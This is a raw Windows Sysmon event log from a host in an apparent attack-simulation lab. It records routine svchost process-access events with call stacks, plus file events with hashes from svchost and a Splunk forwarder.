12:02:16.900{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005025Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.900{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005024Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.900{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005023Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.822{266CAFBE-64C6-6064-A900-00000000AE01}3404NT 
AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG1MD5=08D33FDECF9DFDB3AAA55E46F4DDF872,SHA256=8890B44AAD4579F4798FAE71AF174F6AA9BF78A2556F77174D8B4E457E600EBE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005022Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.822{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.datMD5=134B2FB2E7188ED9BB83131C1F4907FC,SHA256=1D1EC260A84B289FDCEA6A538DE14870922F2FEDE4B45E10E138F239A8353562,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005021Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.806{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\AC\Microsoft\Windows\855533271\3923659455.priMD5=2D61605026CA74ED5301578606464552,SHA256=84019A9745D574D378277A1084C237265451F0C45196348372A715711610EB40,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005020Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.806{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\AC\Microsoft\Windows\3339743440\902793749.priMD5=98C999EAE532EE8FCB19ED482C1C0B6B,SHA256=081F850F71892C895B1808104D3C2B5293448F0F6B9E5003FD1D69DF5BD8E8B1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005019Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.682{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C07850EF36E704838FDEE64CCD1F4747,SHA256=1852B3CEB9B5165EEB8084E39BD5075F6AB24D56A251DECA0CD0142B2D3959B4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005018Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.651{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005017Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.651{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005016Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.651{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\AppReadiness\S-1-5-21-4055678433-3894535204-3898404691-500MD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005015Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.620{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005014Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.620{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005013Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.620{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005012Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.620{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005011Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.620{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005010Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.620{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005009Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.620{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005008Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.620{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005007Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.620{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005006Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.620{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005005Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.620{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005004Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.620{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005003Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.620{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005002Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.620{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005001Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.620{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005000Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.620{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004999Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
